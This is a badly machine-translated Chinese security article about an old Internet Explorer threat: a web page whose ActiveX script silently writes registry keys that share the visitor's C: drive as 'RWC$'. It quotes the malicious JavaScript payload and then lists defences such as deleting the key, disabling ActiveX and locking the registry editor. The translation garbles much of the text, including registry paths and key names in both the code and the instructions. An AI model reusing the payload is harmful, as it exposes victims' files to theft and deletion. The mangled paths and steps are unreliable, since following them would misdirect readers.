Now the Internet is really unsafe. The most fierce in the front is "Wanhua". If you enter the web browser registry, a lot of system functions are limited. Recently I heard that some netizens have been shared by netizens when browsing the web, and the harm seems to be bigger! In fact, the so-called browsing web hard drive is shared, like "Wanhua", the victims are browsing the ActiveX web file containing the harmful code. The following is a key section in the original code: script language = javascript document.write (""); function f () {a1 = Document.Applets [0]; a1.setClsid ("{F935DC22-1CF0-11D0-adb9 -00c04fd58a0b} "); a1.createInstance (); shl = a1.GetObject (); shl.regWrite (" hklm // software // microsoft // network // lantventversion // NetWork // lantman // rwc $ //// Flags ", 302," REG_DWORD "); shl.regwrite (" HKLM // Windware // CurrentVersion // NetWork // LanMan // RWC $ // Type ", 0," Reg_dword "); SHL.REGWRITE ("HKLM // Software // Microsoft // WINDWORK / / LANMAN // RWC $ // Path", "C: //");} Function Init () {setTimeout (" F () ", 1000);} init (); / script Note: These code started with" shl.regwrite "is to write to the viewer's registry, in hkey_local_machine / software / microsoft / windows / currentversion / Network / lanman The following add key value "RWC $", in RWC $ ", the key value" flags "," Type "," Type ", which sets the C disk to share, shared name RWC $. And you can't see the hard drive in the network properties! If you change "Flags" = dword: 00000302 to "Flags" = dword: 00000402, you can see the hard disk is shared. Since you only browse this type of web page hard drive Sharing, therefore its harmful Trojan is bigger (personal point of view). If you accidentally trick, then you can give your hard drive to your logical hard drive, he can copy files in your computer. , Delete files, renamed for files ... If this still can't satisfy him, he can give you another Trojan (oh, wrong! No One is a group of Trojans), so you are not as good as death, what secret is not: Internet account, QQ password, give MM's letters ... If he is happy, you can format your hard drive, or in you Software that runs "Jiangmin Bomb" in your computer destroys your hard drive. In short, everything you have is in his master, think about it is terrible? Solution: "RWC $" below HKEY_LOCAL_MACHINE / CURRENTVERSION / NETWORK / LANMAN is deleted.
Little, you can also delete the Windows / System / below VServer.vxd (files on the Microsoft network with printer sharing, virtual device driver), and then the vServer_Machine / System / CurrentControlSet / Services / VXD / Under The value is deleted, and the back of such "Trojans" is never. Defense Prevention: 1, don't easily go to some sites you don't understand, especially those who look beautiful and attractive URLs! 2, run IE, click "Tools → Internet Options → Security → Internet Area's security level, change the security" in "high" 3, because this page is an ActiveX web file containing harmful code, so All of IE settings will be disabled from the ActiveX plug-in and controls, and Java scripts, etc. can be avoided. The specific method is to click "Tools → Internet Options in the IE window. In the pop-up dialog box, select" Security "tab, then click" The Custom Level button will pop up "Security Settings" dialog box, select all of the ActiveX plugins and controls, and Java all select "Disable". However, doing this may cause some website that can use ActiveX from the future web browsing process that cannot be browsed. Hey, it will be disadvantage, you still look at it. 4. For Windows98 users, open C: /Windows/java/packages/cvlv1nbb.zip, delete it "ActiveXComponent.class"; For WindowsMe users, open C: /Windows/java/packages/5nzvfpf1.zip , Delete it "ActiveXComponent.class". Please rest assured that deleting this component will not affect you normally browse. 5, since this type of page is to destroy our system by modifying the registry, then we can lock the registry in advance: to modify the registry, so that the purpose of preventing the prevention. However, what should I do with the registry editor regedit.exe? So we have to prepare a "key" in advance before you can open this "lock"! The locking method is as follows: (1) Run the registry editor regedit.exe; (2) Expand the registry to HKEY_CURRENT_USER / SOFTWARE / Microsoft / Windows / CurrentVersion / Policies / System, create a DWORD value called DisableRegistryTools, and will The value is changed to "1", you can prohibit the use of the registry editor regedit.exe. The unlocking method is as follows: Editing a .reg file with Notepad, such as UNLock.reg, the content is as follows: regedit4 [hkey_current_user / software / microsoft / windows / currentversion / policies / system] "disableregISTRYTOOLS" = DWORD: 00000000 store. You have a key to unlock! If you want to use a registry editor, double click unlock.reg.
